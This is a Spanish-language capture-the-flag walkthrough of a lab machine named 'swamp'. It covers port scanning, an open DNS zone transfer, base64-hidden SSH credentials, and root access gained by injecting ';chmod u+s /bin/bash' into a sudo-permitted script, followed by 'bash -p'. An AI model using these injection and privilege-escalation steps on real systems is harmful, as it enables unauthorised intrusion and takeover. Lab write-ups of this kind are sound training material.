Enumeramos puertos:
❯ sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 192.168.1.45❯ nmap -sCV -p 22,53,80 -oN 02-targeted.txt 192.168.1.45
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-11 21:26 -03
Nmap scan report for 192.168.1.45
Host is up (0.00052s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey:
| 256 65:bb:ae:ef:71:d4:b5:c5:8f:e7:ee:dc:0b:27:46:c2 (ECDSA)
|_ 256 ea:c8:da:c8:92:71:d8:8e:08:47:c0:66:e0:57:46:49 (ED25519)
53/tcp open domain ISC BIND 9.18.28-1~deb12u2 (Debian Linux)
| dns-nsid:
|_ bind.version: 9.18.28-1~deb12u2-Debian
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: Did not follow redirect to http://swamp.nyx
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.47 secondsAgregamos swamp.nyx al /etc/hosts y, dado el servicio DNS (BIND), probamos una transferencia de zona con dig, que está abierta y nos revela varios subdominios:
❯ dig axfr swamp.nyx @192.168.1.45
...
d0nkey.swamp.nyx. 604800 IN A 0.0.0.0
dr4gon.swamp.nyx. 604800 IN A 0.0.0.0
duloc.swamp.nyx. 604800 IN A 0.0.0.0
f1ona.swamp.nyx. 604800 IN A 0.0.0.0
farfaraway.swamp.nyx. 604800 IN A 0.0.0.0
shr3k.swamp.nyx. 604800 IN A 0.0.0.0
...Revisando los subdominios, en el código de farfaraway.swamp.nyx hay un archivo JS con una cadena en base64 que decodifica a unas credenciales:
❯ echo 'c2hyZWs6cHV0b3Blc2FvZWxhc25v' | base64 -d
shrek:putopesaoelasnoNos logueamos por SSH y obtenemos la primera flag:
❯ ssh shrek@192.168.1.45
shrek@192.168.1.45's password: putopesaoelasno
Linux swamp 6.1.0-18-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Feb 11 17:04:34 2025 from 192.168.1.7
shrek@swamp:~$Para escalar privilegios, revisamos los permisos sudo:
shrek@swamp:~$ sudo -l
Matching Defaults entries for shrek on swamp:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User shrek may run the following commands on swamp:
(ALL) NOPASSWD: /home/shrek/header_checkerPodemos ejecutar el script header_checker como root. Recibe una URL como argumento, así que probamos inyección de comandos añadiendo ; y un comando:
shrek@swamp:~$ sudo -u root /home/shrek/header_checker --url ";id"
...
uid=0(root) gid=0(root) groups=0(root)
...Aprovechamos la inyección para asignar el bit SUID a Bash y lanzar una shell de root:
shrek@swamp:~$ sudo -u root /home/shrek/header_checker --url ";chmod u+s /bin/bash"
shrek@swamp:~$ ls -l /bin/bash
-rwsr-xr-x 1 root root 1265648 Mar 29 2024 /bin/bash
shrek@swamp:~$ bash -p
bash-5.2# whoami
rootObtenemos la flag y fin.